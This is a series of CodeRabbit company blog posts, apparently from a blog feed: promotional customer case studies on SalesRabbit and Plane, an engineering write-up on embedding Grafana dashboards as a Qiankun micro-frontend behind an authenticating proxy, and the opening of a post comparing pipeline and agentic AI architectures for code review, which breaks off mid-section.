Code review tools also have some of the highest ROI of any AI tools – including AI coding tools – since they both save significant time and keep bugs out of production. ## Building your own AI dev tool stack: What to consider ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1724d6b6b69f94657814a2293a540a25fa87e46b0e4af567d380e5397315c927_4fd721f479.png) When it comes to building an AI dev tool stack, we’ve seen a number of approaches. Many companies adopted AI coding tools and then iteratively looked for individual solutions to the problems those tools created as downstream issues became particularly painful. Other companies took a more intentional approach with CTOs or other technical leaders investigating tools that could improve the development cycle and running proof-of-concept tests to see whether they actually deliver results. Some even waited to adopt AI coding tools and leveraged AI code review tools to address their existing code review backlogs first. We recommend a proactive approach since we often see teams suffering from delayed milestones and dev burnout before they start looking for solutions. Want more info about what we’ve been seeing around AI adoption of specific tools? We have [another post here](http://www.coderabbit.ai/blog/ai-adoption-how-developers-are-using-ai-dev-tools) where we go into greater detail about the different types of tools in each category and how we’re seeing them help engineering teams. We’d love to hear more about how you’re building your AI dev tool stack and what’s working for you. Tag us on [Twitter](https://x.com/coderabbitai) or [LinkedIn](https://www.linkedin.com/company/coderabbitai). ***Interested in trying out our AI code review tool? Get a*** [***14-day free trial!***](https://app.coderabbit.ai/login?free-trial&_gl=1*1h48txm*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx*_ga*NTAxMzUzODg4LjE3NDQ5MjkzMzE.*_ga_7YWHDJSXQ1*czE3NDk1MTI5OTQkbzcxJGcwJHQxNzQ5NTEyOTk0JGo2MCRsMCRoMTUzMTQ4NzEwMw..)

How SalesRabbit reduced bugs by 30% and increased velocity by 25%

Manpreet Kaur — Thu, 05 Jun 2025 00:00:00 GMT

## **Overview** [SalesRabbit](https://salesrabbit.com/), a CRM and canvassing platform used by roofing, solar, and pest control companies, is no stranger to legacy code. In recent years, SalesRabbit has expanded its product line through multiple acquisitions – including [RoofLink in 2024](https://salesrabbit.com/insights/salesrabbit-acquires-rooflink-creates-incredible-value-for-rooftop-sales-teams/), a roofing-focused CRM. Those expansions came with new challenges: multiple legacy codebases in different languages (C#, Elixir, Python, and even C) and no easy way to assess code quality across them. With 20 engineers, CTO Michael Archibald needed a scalable way to maintain engineering velocity while gaining visibility into an inherited codebase, reducing bugs, and supporting less experienced developers on the team. That’s where CodeRabbit came in. ## **The challenge: Legacy codebase & high defect rates** Before CodeRabbit, SalesRabbit was trying to grapple with an inherited codebase from a new acquisition while dealing with many of the common challenges engineering teams face around code reviews. Those included delays in reviews that slowed down deployment velocity and inconsistent coding standards. * **Unfamiliar legacy codebases after acquisitions** The SalesRabbit team was spread out across a growing number of languages. While SalesRabbit started as a PHP application, they acquired a company with a C# codebase, shifted some of their own codebase to Elixir, and were about to buy RoofLink, whose code was in Python. It was the introduction of that Python codebase with SalesRabbit’s acquisition of RoofLink that initially prompted Michael to research AI code review tools. “I was looking for some automated tools, primarily AI, that could help us understand the codebase a little faster and better validate the quality of the code,” he shared. * **High defect escape rate** Michael has always been hyper-focused on improving application quality. 
When he joined SalesRabbit as CTO six years ago, the company was facing frequent downtime. Since then, they've improved to 99.99% availability and scaled their team. But, after the acquisition, RoofLink’s defect escape rate gave him cause for concern. While RoofLink wasn’t tracking how many bugs made their way to production, anecdotally, the RoofLink support team told him they were used to fielding customer complaints on nearly every release. It seemed clear that the code at the company wasn’t being as thoroughly reviewed as it should be. * **Slow review cycle** With an ambitious roadmap and multiple products across the company, Michael had to ensure the team maintained velocity. But manual code reviews were inconsistent and often took several days, slowing deployment significantly. One problem was that the team had a large number of junior engineers – which meant fewer senior developers who could review code. Michael wanted a solution that would make reviews easier. * **AI coding tools caused code quality issues** While SalesRabbit’s engineers leveraged Copilot and other AI coding tools to help write code faster, those tools created problems with code quality. “The junior engineers were introducing a lot of bugs with these tools,” Michael explained. That caused him to try to find other AI tools that would better support the junior engineers on the team. * **Inconsistent coding standards** Different teams across SalesRabbit and RoofLink used different styles and standards, often due to legacy standards at the acquired companies. But style inconsistencies added friction. A central governance layer was needed to enforce best practices. “We just want everyone to be the same,” said Michael. ## Why SalesRabbit loves CodeRabbit %[https://youtu.be/0WmK5QqqjJY?feature=shared] ### **The engineers all wanted it – and used it** Michael wasn’t initially convinced that CodeRabbit would solve his team’s problems. “I came across CodeRabbit and thought, ‘It's relatively inexpensive.
I'm going to just give one or two engineers a seat and see how they like it,’” he explained. “But almost immediately everybody on my team was like, oh, I want this, I want this.” That level of enthusiasm for a tool is something Michael listens to. When he joined SalesRabbit, the company was facing 80% engineering churn and he’s since worked hard to improve developer satisfaction and stabilize the engineering org. “One of the litmus tests for me with AI tools is: do engineers want it? I don’t like pushing AI tools on engineers,” Michael said. “With CodeRabbit, everybody asked for it almost immediately.” Although CodeRabbit was initially tested with junior developers, senior engineers also quickly recognized its value around bug fixes, refactor suggestions, and security checks. “With CodeRabbit, everybody was like, give me this. This is fantastic. It speeds up code reviews,” Michael said. “We went from a small test to full adoption very quickly.” ### **CodeRabbit found more issues than any human** While Michael had been worried about RoofLink’s defect escape rate, CodeRabbit reduced it significantly – and almost immediately. “We could have started putting processes in place to improve things but those can take weeks and months before we get measurement,” he explained. “CodeRabbit seemed to have an almost immediate impact. Code quality has gone up and the only thing we've adjusted has been adding CodeRabbit to all of the deploys.” Michael isn’t surprised it’s been so effective at reducing issues. “I feel very comfortable saying that it's caught a lot more bugs than any human has,” he said. ### **An AI tool that… didn’t introduce more bugs** Unlike Copilot and other AI coding tools, which focused on writing code and resulted in a lot of added bugs, CodeRabbit focused on finding and fixing them. That gave SalesRabbit the visibility and quality gates they needed at the PR stage to keep defects out of production. “It works especially well for junior developers,” Michael said.
“It helps them spot patterns and mistakes they’d otherwise miss.” SalesRabbit was also able to more quickly understand their inherited codebase. “It really helped us to determine the code quality,” shared Michael. ### **It fixed style consistency issues** CodeRabbit’s built-in style enforcement reduced the need for custom linters or style checkers, helping standardize code across legacy and modern languages. “CodeRabbit does a really good job saying, ‘this might be a bad pattern’ or ‘you’re not following style here,’” Michael explained. “We were able to get rid of a lot of tooling we put in place for managing code styles because CodeRabbit has a version of that built-in.” What’s helpful is having one centralized code quality enforcement tool for legacy languages like C# and modern ones like Elixir and Python. “We just want everyone to be kind of the same,” said Michael. “CodeRabbit does that for us.” ## The results: Better code, lower defect rate, happier engineers ![](https://victorious-bubble-f69a016683.media.strapiapp.com/80b14bd59c022c52783551ba24cf230656ae1b2c5cc3c082943c4d440a738b87_6e349aaf64.png) With CodeRabbit, SalesRabbit has seen impressive results: ### **30% fewer defects** The defect escape rate decreased by at least 30% after introducing CodeRabbit, improving system reliability. Support teams even noticed the difference. “It had almost an immediate impact,” Archibald said. ### **25% faster deployments** CodeRabbit’s automated first-pass review enabled faster iterations, reducing release cycle time – even with a complex legacy codebase. Then, one-click fixes helped them quickly commit the changes identified. ### **Significant style and standards consistency improvements** While it’s hard to measure, Michael feels strongly that CodeRabbit helped them level up their code quality significantly. “It's improved our code style,” he attests. ### **Happier engineers** Michael’s focus is on keeping the engineers at SalesRabbit happy ***and*** productive.
That’s why he’s never wanted to push AI tools on them that they didn’t want. But CodeRabbit was a tool that his engineering team all wanted. “The developers have really enjoyed using it,” he shared. ## **CodeRabbit = Less review overhead, more velocity** For SalesRabbit, adopting CodeRabbit was low-lift but high-impact. Their team was able to merge PRs at least 25% faster, improve defect detection in legacy C# and Python code, and increase developer efficiency by freeing them from multi-day review cycles. The AI-powered reviews only take hours now, instead of days, and enable faster deployments. CodeRabbit was also able to find bugs that junior engineers were letting slip by when using AI coding tools. With review cycles shortened, developer confidence increased, and the entire team more aligned around coding practices, Michael’s glad he found CodeRabbit when he did. As Michael puts it: *“Before CodeRabbit, we struggled with inconsistencies in code reviews and defects slipping into production. It’s improved our coding standards, especially in C#, provided a centralized governance layer for code style enforcement, and significantly reduced production defects.”* With CodeRabbit’s expanding feature set, especially the recent support for automated docstring insertion and the future support for agentic workflow-based automated unit-test insertion, SalesRabbit anticipates seeing even more efficiency gains soon. Want to see how CodeRabbit can help your team? [**Get a 14-day trial.**](https://coderabbit.link/aaSJ3ng)

How we built dashboards with a micro-frontend & Grafana

Gurinder Singh — Mon, 02 Jun 2025 00:00:00 GMT

Modern dev teams rely on data. Without analytics, how would you know if your team is improving its deployment velocity and code quality over time? At CodeRabbit, we want teams to have the data that matters when it comes to tracking their performance. That’s why we created a unique integration with [Grafana](https://grafana.com/), a leading analytics platform, that provides greater visibility into your organization’s code review metrics through interactive dashboards directly in the CodeRabbit UI. [CodeRabbit](http://www.coderabbit.ai), an AI-powered code reviewer, can be seamlessly installed on your git platform to review pull requests and deliver actionable insights. By embedding Grafana as a micro-frontend, we’ve made it easier for teams to understand the impact of code reviews on their organization. In this post, we’ll cover why we decided to integrate dashboards in our application via a micro-frontend framework and how we built our Single SPA micro-frontend with the help of [Qiankun](https://qiankun.umijs.org/). ## Why use Grafana as a Single SPA micro-frontend? When it comes to showing analytics in a single-page application, developers often face challenges. Building custom dashboards from scratch requires significant coding effort, and maintaining that code becomes a burden. Adding new metrics or dashboard panels typically involves creating new APIs and modifying frontend code, making the process slow and cumbersome. To address these challenges, we decided to leverage Grafana as a Single SPA micro-frontend. This decision allowed us to streamline the addition of new dashboards while managing Grafana separately and deploying updates with ease. By doing so, we reduced development overhead and improved scalability. ## Adding Grafana as a Single SPA micro-frontend with Qiankun Grafana offers robust data visualization capabilities. 
To integrate it seamlessly into our UI, we [forked Grafana](https://github.com/coderabbitai/grafana), customized its dashboard page, and implemented it using [Qiankun](https://qiankun.umijs.org/). This micro-frontend architecture enabled us to retain the native Grafana experience while tailoring the interface to align with CodeRabbit’s needs. Micro-frontend architectures are particularly useful when integrating multiple JavaScript frontend applications, even those built with different frameworks. After exploring various micro-frontend framework options, we chose the [Qiankun](https://qiankun.umijs.org/) micro-frontend library to implement this architecture. Qiankun, built on top of the [single-spa](https://single-spa.js.org/) micro-frontend framework, provides a simple API that makes it easy to manage micro-frontend architectures. ## Using the Qiankun micro-frontend framework to overcome architectural challenges Most micro-frontends are mounted in the main app based on specific routes. However, our use case required dashboards to be displayed dynamically across multiple routes and on tab changes. To achieve this, we used Qiankun’s loadMicroApp API, which is built on the single-spa parcel API under the hood. This approach let us mount dashboards on demand instead of tying them to a single route. To improve performance and load times, we also added caching to our Grafana proxy server. ## Securing our Grafana micro-frontend with authentication Authenticating Grafana using our UI credentials was a critical challenge. Typically, Grafana relies on an API key for access. To handle this, we created a proxy server that first authenticates a CodeRabbit user and then forwards the request to Grafana. While this setup worked initially, it exposed a potential vulnerability: Grafana allowed any query to be sent in the request, posing a risk of data leaks. To mitigate this, we added a validation layer that: 1. Ensures only pre-defined queries are allowed. 2. Scopes requests to specific organizations and restricts access to queries explicitly associated with dashboards. This solution secured the Grafana micro-frontend integration by preventing unauthorized data access. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3b1c5d9aa3df1a4727da5bdd9cc77bcbc6dd92ba3d75205506f3e5302be1eb54_a6f68728ab.png) The flow diagram above shows an overview of the micro-frontend architecture. The CodeRabbit UI mounts the Grafana dashboard using Qiankun by accessing a public micro-frontend endpoint that exports component lifecycle functions. Once mounted, all API calls to Grafana are routed through our authentication service for secure access. ## Our use case for dashboards ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ccda3bf76d8af7146a853636709307def81766db20537f87fc2e2964b33e99fc_575f5c4e02.png) At CodeRabbit, our goal is to demonstrate the value our product adds to an organization by providing AI-driven code reviews. To achieve this, we collect and analyze data stored in our data layer and use it to create insightful panels that tell the story of CodeRabbit's impact on our customers’ development cycle. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a8d207f787b4cacffaf8e6a45ba8d695709844132ca28beadbbef703dc98219a_e384465650.png) The dashboards include metrics such as the average number of pull requests (PRs) reviewed per day and the total number of reviews conducted by CodeRabbit. Additionally, they showcase the various language-specific tools leveraged to fine-tune reviews, offering deeper insights into how CodeRabbit adapts to diverse development environments. These panels also highlight key contributions, such as the number of comments, suggestions, and chat conversations facilitated by CodeRabbit to improve code quality.
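To make the validation layer from the authentication section more concrete, here is a minimal TypeScript sketch of an allowlist check that a proxy could run before forwarding a query to Grafana. It illustrates the two rules described earlier (only pre-defined queries, scoped to the caller's organization) and is not CodeRabbit's actual implementation. Every name in it (`SessionUser`, `DashboardQueryRequest`, `ALLOWED_QUERIES`, `validateRequest`), the dashboard UID, and the query text are assumptions made for illustration.

```typescript
// Hypothetical sketch: none of these names or queries come from CodeRabbit's codebase.

// The authenticated CodeRabbit user, as resolved by the proxy (assumed shape).
interface SessionUser {
  userId: string;
  orgId: string;
}

// What the embedded dashboard sends to the proxy (assumed shape).
interface DashboardQueryRequest {
  dashboardUid: string;
  queryText: string;
  orgId?: string; // client-supplied, so it is never trusted on its own
}

type ValidationResult =
  | { ok: true; queryText: string; orgId: string }
  | { ok: false; reason: string };

// Pre-defined queries, keyed by the dashboard they belong to (illustrative values).
const ALLOWED_QUERIES = new Map<string, ReadonlySet<string>>([
  [
    "review-metrics",
    new Set([
      "SELECT day, count(*) FROM reviews WHERE org_id = $orgId GROUP BY day",
    ]),
  ],
]);

// Collapse whitespace so formatting differences do not defeat the exact-match check.
function normalize(queryText: string): string {
  return queryText.replace(/\s+/g, " ").trim();
}

function validateRequest(
  user: SessionUser,
  request: DashboardQueryRequest,
): ValidationResult {
  // Rule 1: the query must be one of the pre-defined queries for this dashboard.
  const allowed = ALLOWED_QUERIES.get(request.dashboardUid);
  if (allowed === undefined) {
    return { ok: false, reason: "unknown dashboard" };
  }
  const queryText = normalize(request.queryText);
  if (!allowed.has(queryText)) {
    return { ok: false, reason: "query is not pre-defined for this dashboard" };
  }
  // Rule 2: the request must stay inside the caller's organization.
  if (request.orgId !== undefined && request.orgId !== user.orgId) {
    return { ok: false, reason: "organization mismatch" };
  }
  // The organization always comes from the authenticated session.
  return { ok: true, queryText, orgId: user.orgId };
}
```

In this sketch the proxy would forward the request to Grafana only when `ok` is `true`, binding `orgId` from the session rather than from anything the browser sent. An exact-match allowlist is the simplest option to reason about; a real deployment might instead derive the allowed queries from the provisioned dashboard definitions.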
![](https://victorious-bubble-f69a016683.media.strapiapp.com/e99b337d066a5df5998b63731c696c78922176d3855b743afc7dffe68ec7007f_a4578a6917.png)

By integrating Grafana as a single-spa micro-frontend, we were able to design and serve these visualizations seamlessly within the CodeRabbit UI while reducing the amount of development and maintenance work.

## Benefits of single-spa micro-frontend architecture

Integrating Grafana as a single-spa micro-frontend has transformed how we deliver analytics to our users. Because Grafana runs as a separate service, updating a dashboard only requires changing it in Grafana and rolling out the change with Grafana’s dashboard provisioning.

Using Grafana as a Qiankun and single-spa micro-frontend in CodeRabbit has allowed us to deliver a powerful, secure, and dynamic analytics experience for our users. Looking ahead, we plan to expand our dashboard offerings and explore additional Grafana plugins to provide even more insightful analytics.

For developers looking to streamline analytics integration, we highly recommend exploring Grafana as a micro-frontend. It’s a game-changer for simplifying dashboard management and enhancing scalability.

Interested in trying out CodeRabbit? [Get a free 14-day trial.](https://app.coderabbit.ai/login???free-trial&_gl=1*1x8ils1*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx) Want to join our team? Check out our [Careers page!](https://coderabbit.link/63iJMZY)

How CodeRabbit helped Plane get their release schedule back on track

Aravind Putrevu — Fri, 30 May 2025 00:00:00 GMT

## **Overview** [Plane](https://plane.so/), an open-core project management solution, had an ambitious roadmap and a tight-knit team determined to move fast. Despite the frontend team’s small size—just 12 engineers—they were responsible for significant scope: building and maintaining their cloud, self-hosted, and [popular open source](http://github.com/makeplane/plane) versions, fixing bugs, deploying new features, and continuously improving Plane’s performance and security. As the most popular open source project management tool, they also needed to review multiple, complex pull requests a day – including those from their many OSS contributors. That proved to be a blocker for the team. *“Long review cycles slowed us down,*” explained Principal Engineer Sriram Veeraghanta. *“Without clear PR summaries, understanding changes took time, delaying merges and feature releases. Bugs and inconsistencies slipped through, adding to tech debt.”* Eager to free up developer time and get their release schedule back on track, Sriram decided to try CodeRabbit, an AI-powered code review platform recommended to him by one of Plane’s OSS contributors. The result? Drastic improvements in review speed, code quality, and developer satisfaction. For Plane, that translated into less time spent buried in pull requests and more time hitting milestones that actually matter. ## **The challenge: A manual code review bottleneck** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c21b64615bee4ece77a613a641eafe17e33c5a1934a1a3dd28b44a127395ec5f_82626eb888.png) Before CodeRabbit, Plane relied on what Sriram characterized as the ‘standard process’ of manual reviews using code editors and GitHub’s built-in tools. *“It worked,”* he shared, *“but was time-consuming and required a lot of back-and-forth to fully understand changes.”* That manual code review process just couldn’t keep up with the speed of Plane’s development cycle. 
* **High pull request volume** As an application-layer SaaS company building flexible open-core project management software, Plane’s roadmap involved building a wide range of vertical features. That – plus the typical volume of spam and fluff PRs an OSS tool receives – translated into a steady stream of PRs. For Plane’s senior engineers, that made for an overwhelming daily workload of scanning line after line during manual code reviews. With [research showing](https://www.atlassian.com/blog/add-ons/code-review-best-practices) quality degradation in manual code reviews after 1 to 2 hours a day or reviewing ~400 lines, Sriram’s team struggled to keep up.
* **Limited context in PRs** Many developers wrote only brief or no descriptions for their PRs, forcing reviewers to piece together a puzzle. *“It was hard to grasp the context,”* recalled Sriram. *“I had to manually go through files to understand the changes.”*
* **Slowed delivery and hidden bugs** Manual code reviews caused merges and releases to slow down – interfering with Plane’s product roadmap. While basic static checks or linting tools caught some issues, many bugs, vulnerabilities, and large-scale refactoring complications often slipped through as each PR demanded significant engineering attention.
* **Trapped in a cycle of low developer productivity** With developers spending so much time on manual code reviews, they had less time to concentrate on writing code. That hurt not just velocity but also code quality, which in turn meant that future code reviews would take even longer. That led to what felt like endless review cycles for Plane’s senior engineers.

## **Why Plane loves CodeRabbit**

### **Instant AI Summaries & Sequence Diagrams**

For Plane, CodeRabbit’s AI-generated summaries and Sequence Diagrams were an immediate time-saver. *“With CodeRabbit, AI-generated summaries give me instant context and the visual file structure helps me spot critical changes quickly,”* Sriram explained.
*“These made it much easier to review changes quickly and catch critical issues without going through every file manually.”* That alone shaved hours off their daily reviews.

### **Early issue detection**

Like most small teams, Plane has to balance rapid iteration with stability and scalability – something that is harder to do if you’re always responding to issues in production or when the codebase has significant tech debt. AI code reviews helped considerably: *“Automated reviews catch issues early, improving both speed and code quality,”* shared Sriram. With CodeRabbit, issues they might have missed before, including security vulnerabilities, logic errors, or concurrency pitfalls, were flagged right away. This proactive approach reduced the chance of shipping bugs into production.

### **Faster, more efficient workflows**

Plane’s workflow improved dramatically because CodeRabbit goes beyond traditional static analysis by understanding the context behind code changes and leveraging the advanced reasoning of generative AI. *“AI changed the game by accelerating reviews, providing better context, and catching issues early, making the entire workflow more efficient,”* Sriram shared.

### **Set up in minutes**

Implementing CodeRabbit was a breeze for Plane, which meant the team was able to start seeing value right away. *“The setup was seamless: we configured CodeRabbit in just a few minutes, and the bot started reviewing our PRs instantly,”* Sriram explained. *“It fit right into our workflow without any friction.”*

## **The results: Quality code, shipped faster**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/9f2c108e6568b534f046f7cbad4a33265c95091aeafb7c2a90ba3b796c094d83_8cfebb54d7.png)

Once CodeRabbit was fully in place, Plane saw quick improvements to their process:

### **Significantly decreased code review time**

*“PR review time has significantly decreased, improving deployment speed,”* shared Sriram.
Code reviews that used to take hours were now completed in a fraction of the time. CodeRabbit customers generally see a **50% reduction** in overall review time.

### **Fewer bugs reaching production**

By catching issues at the PR stage, the Plane team saw notable reductions in post-release fixes. *“Fewer bugs make it into production thanks to early issue detection,”* explained Sriram. Across our customers, CodeRabbit **catches an average of 90%+ of all bugs and errors.**

### **Faster merge cycles**

With better context and fewer open questions, the team was able to merge PRs faster – and not fall behind on their release schedule. *“We now spend less time on back-and-forth and more time shipping quality code,”* explained Sriram. While results vary from team to team, CodeRabbit customers see an average of **4x faster PR merges.**

### **Improved developer productivity**

Less back-and-forth in PR discussions and less time on manual code reviews have allowed engineers to focus on building rather than reviewing. For that reason, Sriram believes CodeRabbit is essential for any development team. After all, *“developer productivity is crucial for any organization,”* he shared.

### **Immediate impact**

Plane started seeing value almost immediately, with faster reviews, better PR context, and improved collaboration. *“CodeRabbit has sped up reviews, improved visibility, and helped catch issues early,”* Sriram shared.

## CodeRabbit = No more code review bottlenecks

By implementing CodeRabbit, Plane successfully tackled the code review bottleneck that had slowed their team’s momentum. They’re now shipping features faster, collaborating more effectively as a team, and maintaining a high standard of code quality. As Sriram puts it: *“Code reviews are no longer a bottleneck. AI-driven insights help us catch issues early, and the team can focus more on writing better code rather than spending excessive time reviewing.
The overall workflow is smoother and we ship faster with more confidence.”* Want to see how CodeRabbit can help your team? [Get a 14-day trial.](https://coderabbit.link/Mz8rjrT)

Pipeline AI vs agentic AI for code reviews: Let the model reason — within reason

David Loker — Thu, 29 May 2025 00:00:00 GMT

AI has changed what code reviews can be. We’ve gone from static rules and regex-based linters to systems that can actually read a diff and respond with feedback that resembles what a senior engineer might say. That’s real progress. But as companies like CodeRabbit create production-grade systems for code reviews or for other developer-focused tools, we all face a core architectural question: **Do you give the AI autonomy to plan and act like an agent? Or do you structure the process as a predictable AI pipeline?** This choice affects more than just implementation. It shapes how fast your system runs, how much developers trust it, how you debug it when it breaks, and what it takes to maintain it long-term. And while the architecture matters, it's not the end goal. These are just different ways of trying to answer the same underlying question — *How do we give the model everything it needs (and nothing more) to deliver the best code review possible?* That’s the real challenge. Not "agentic AI" vs. "pipeline AI." Just building the best possible tool for the people who use it. We’ll come back to that. But first, let’s define the two camps. ## **AI architectural patterns: Agentic AI vs. pipeline AI** ### **Agentic AI systems** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b6dd24757651b7110b343ddb043b90423f2af80fbf2daf043082f622c14194e5_f065cc35f1.png) In an agentic architecture, the model isn’t locked into a single prompt. It’s allowed to think step-by-step, make decisions, and use tools as it goes. Often this means: * Planning a course of action * Calling a tool (e.g. grep, a static analyzer, test runner) * Observing the output * Deciding what to do next This approach — often referred to as **ReAct (Reason + Act)** — is one of several reasoning patterns used to guide agent behavior. 
It shows up across a range of modern systems and research prototypes, but the core idea is the same: the model can reason, act, observe, and repeat, using external tools and memory to enrich its output. That flexibility is incredibly promising. It’s also incredibly hard to get right.

### **Pipeline AI systems**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e84602517a67381d106c30fee1e8839e12f101f30320df067a0287281c1f4d16_326a71114d.png)

Pipeline AI-based systems take a more deterministic approach. You define a sequence:

1. Prepare inputs (e.g. diff, relevant file slices, issue text)
2. Run pre-processing (e.g. static analysis, code search)
3. Call the model with a crafted prompt
4. Post-process the output into review comments

This approach is predictable, fast, and easy to test. It’s also easier to integrate into CI workflows, where speed and reproducibility matter.

Many tools use a pipeline AI backbone as their foundation. However, most modern implementations also incorporate elements of agentic behavior. They may dynamically adjust prompts, use retrieval strategies, or support interactive review flows. They aren’t fully agentic, but they aren’t rigidly linear either.

Which brings us to the reality most teams face: you don’t have to pick a side. Most real-world systems live somewhere in the middle, not for philosophical reasons, but because that’s what it takes to ship something reliable, adaptable, and useful.

## **Hybrid AI systems: A spectrum, not a binary**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/98276c5b4655f2b468dba375d4f58e869591e78b76acf1978651db7a4196d7a9_4fcda9bb89.png)

In practice, many real-world systems don’t land fully in either the agentic AI or pipeline AI camp. They blend elements of both, taking the structure and reliability of pipelines and layering in tool use, learned behavior, or context enrichment strategies that are often associated with agents.
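
To make the pipeline side of that blend concrete, here is a minimal sketch of the four-step sequence from the pipeline section (prepare inputs, pre-process, call the model, post-process). It is an illustration only, not CodeRabbit's implementation: every function name is hypothetical, the "static analysis" is a toy TODO check, and the model is passed in as a plain callable so no real LLM API is assumed.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class ReviewInput:
    diff: str
    issue_text: str


def prepare_inputs(diff: str, issue_text: str) -> ReviewInput:
    """Step 1: gather and normalize the raw inputs."""
    return ReviewInput(diff=diff.strip(), issue_text=issue_text.strip())


def preprocess(inputs: ReviewInput) -> list[str]:
    """Step 2: toy stand-in for static analysis; flags added lines that contain TODO."""
    findings = []
    for line in inputs.diff.splitlines():
        is_added = line.startswith("+") and not line.startswith("+++")
        if is_added and "TODO" in line:
            findings.append(f"Added line contains TODO: {line[1:].strip()}")
    return findings


def build_prompt(inputs: ReviewInput, findings: list[str]) -> str:
    """Step 3a: assemble one fixed-shape prompt from the inputs and findings."""
    notes = "\n".join(findings) or "none"
    return (
        f"Issue:\n{inputs.issue_text}\n\n"
        f"Pre-analysis findings:\n{notes}\n\n"
        f"Diff:\n{inputs.diff}\n\n"
        "List review comments, one per line."
    )


def postprocess(raw_output: str) -> list[str]:
    """Step 4: turn the raw model text into a clean list of review comments."""
    comments = []
    for line in raw_output.splitlines():
        text = line.strip().lstrip("-* ").strip()
        if text:
            comments.append(text)
    return comments


def run_pipeline(diff: str, issue_text: str, call_model: Callable[[str], str]) -> list[str]:
    """Run the fixed sequence once; the model is called exactly one time (step 3b)."""
    inputs = prepare_inputs(diff, issue_text)
    findings = preprocess(inputs)
    return postprocess(call_model(build_prompt(inputs, findings)))
```

Because each step is an ordinary function with a fixed order, every stage can be unit-tested with a fake `call_model`, which is the testability and reproducibility advantage the pipeline approach is valued for.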
[**CodeRabbit**](https://cloud.google.com/blog/products/ai-machine-learning/how-coderabbit-built-its-ai-code-review-agent-with-google-cloud-run) is a good example of this kind of hybrid AI architecture. [GitHub Copilot PR Reviews](https://github.blog/changelog/2025-04-04-copilot-code-review-now-generally-available) also falls into this category. While their interfaces and goals differ, they share similar DNA: both blend structured inputs with retrieval, static analysis, and interactive flows.

We go deeper into CodeRabbit’s AI pipeline and enrichment strategy later in this post, but in short: it blends the determinism and predictability of pipelines with dynamic, learned behavior and targeted context augmentation, sitting squarely between the two paradigms.

Hybrid AI systems like this sit along a spectrum, and that's the point. You don’t have to go all-in on one paradigm. You just have to solve for what matters: helping your users make better decisions, faster, with fewer surprises.

Hybrid systems aim to combine the strengths of agentic and pipeline systems while limiting the weaknesses of each. Striking that balance can be difficult and usually takes some experimentation, and the added control and flexibility can increase the cost of development and maintenance.
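
One way to picture "agentic behavior inside a structure" is a reason-act-observe loop with a hard step limit. The sketch below is a simplified illustration, not how CodeRabbit or any particular agent framework works: `run_bounded_agent`, the `Policy` type, and the tool names are hypothetical, and the policy function stands in for the model's decision about which tool to call next.

```python
from typing import Callable, Optional

# A policy stands in for the model: given the observations so far, it returns
# (tool_name, argument) for the next action, or None when it is finished.
Policy = Callable[[list[str]], Optional[tuple[str, str]]]


def run_bounded_agent(
    policy: Policy,
    tools: dict[str, Callable[[str], str]],
    max_steps: int = 3,
) -> list[str]:
    """Reason, act, observe, repeat, but never more than max_steps times."""
    observations: list[str] = []
    for _ in range(max_steps):
        action = policy(observations)  # reason: decide what to do next
        if action is None:
            break  # the policy decided it has enough context
        tool_name, argument = action
        tool = tools.get(tool_name)
        if tool is None:
            # Only registered tools can run; an unknown name becomes an observation.
            observations.append(f"unknown tool: {tool_name}")
            continue
        observations.append(tool(argument))  # act, then observe the result
    return observations
```

The step cap and the fixed tool registry are the hard constraints here: a policy that keeps asking for more context is cut off after `max_steps` calls instead of looping indefinitely, and it can never invoke anything outside `tools`.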
## **Tradeoffs between AI architecture patterns**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/5d7a51eface2d67beba539aa45900cae4a78f4d046b4fd63b6263e2b54d6c836_d40afdb7f6.png)

| **Dimension** | **Agentic systems** | **Pipeline systems** |
| --- | --- | --- |
| **Latency** | Multi-step, often slower | Fast, predictable |
| **Tool Use** | Dynamic and adaptive | Static and consistent |
| **Trust** | Harder to test, less predictable | Easier to debug and validate |
| **Context Handling** | On-demand, but error-prone | Predefined and controlled |
| **Workflow Fit** | Interactive tools | CI/CD and production PR reviews |

Agentic AI systems offer flexibility, but flexibility is a double-edged sword. They can fetch exactly what’s needed… or fetch everything and drown in noise. They can reason step-by-step… or loop forever. You need good defaults, good tools, and often, some level of hard constraint.

Pipelines, by contrast, are stable. You get speed, control, and a well-bounded behavior space. But they can be rigid. If the context isn’t there at the start, the model can’t do much about it.

That’s the tradeoff. And that’s what most of us are doing here: not debating abstractions, but working to build the best damn tool we can. For ourselves. For our teams. For the developers who need to ship something today.

The AI architecture pattern you use is just a means to an end. The real work, and the real leverage, lies somewhere else.

## **AI context is the real bottleneck: Why autonomy needs structure**

### **More context isn’t always better**

In AI code review, we spend a lot of time debating architecture (agentic AI vs. pipeline AI), but the real performance bottleneck is often upstream: **what context we give the model**.

There’s a common assumption: *If we just add more AI context (more code, more metadata, more analysis), the model will perform better.* But that’s not how it works.
* Too much irrelevant input overwhelms the model ([Secure Code Review at Scale](https://github.com/247arjun/ai-secure-code-review/blob/main/Automated%20Secure%20Code%20Review%20at%20Scale%20Using%20Static%20Analysis%20and%20Generative%20AI.md#:~:text=Another%20lesson%20learned%20is%20that,be%20a%20very%20subjective%20measure)) * Prompt noise leads to muddled reasoning and false positives ([Secure Code Review at Scale](https://github.com/247arjun/ai-secure-code-review/blob/main/Automated%20Secure%20Code%20Review%20at%20Scale%20Using%20Static%20Analysis%20and%20Generative%20AI.md#:~:text=LLMs%20tend%20to%20hallucinate%20far%20less%20when%20analyzing%20a%20specific%20code%20snippet%20or%20diff)) * Even high-quality tools can generate low-quality AI context if used indiscriminately ([Anthropic Case Study](https://www.anthropic.com/customers/coderabbit#:~:text=assurance%20processes%20requiring%20multiple%20specialized,dependent%20vulnerabilities)) More isn’t better. **Better is better.** ### **Agent autonomy sounds great — but struggles in practice** Agentic systems promise flexibility: let the model decide what it needs, when it needs it, and fetch context accordingly. In theory, this is ideal. In practice, it’s messy. 
Common failure patterns:

